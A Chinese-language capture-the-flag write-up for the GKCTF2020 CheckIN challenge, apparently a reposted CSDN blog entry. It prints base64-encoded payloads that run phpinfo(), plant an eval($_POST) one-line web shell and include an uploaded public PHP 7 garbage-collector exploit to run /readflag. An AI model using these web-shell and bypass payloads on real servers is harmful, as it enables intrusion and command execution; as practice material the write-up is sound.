GKCTF2020 CheckIN Writeup

打开实例是一段PHP代码。

通过代码没有发现反序列化函数，但是可以通过Ginkgo传参，但必须要传经过base64编码后的。上传phpinfo();试试，顺便看看php版本，将**phpinfo();**经base64编码后上传。

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==

如下图

上传个一句话木马试试,将**eval($_POST[a]);**经base64编码后上传

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbYV0pOw==

使用蚁剑连接试试

连接成功后，查看根目录

发现有flag文件，但权限不够看不了。readflag打开后乱码，于是想到执行readflag获取flag内容。但怎么执行呢，我也不会了，看wp后知道。php版本为7.3，这个版本有一个漏洞，php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令影响范围是linux，php7.0-7.3给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php下载后进行修改，改为pwn("/readflag");，注意我这里将exploits.php文件改名为了111.php

上传挨个试，发现tmp可以上传，于是就上传到tmp中。进入tmp目录中，右键，然后点上传。上传成功后，执行文件包含。将include('/tmp/111.php');经base64编码后上传。

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=aW5jbHVkZSgnL3RtcC8xMTEucGhwJyk7

得出flag

这题难就难在那个执行readflag，以后要注意不同php版本的漏洞。

标签：tmp,Writeup,CheckIN,base64,readflag,Ginkgo,GKCTF2020,php,上传
来源： https://blog.csdn.net/qq_45619909/article/details/115598299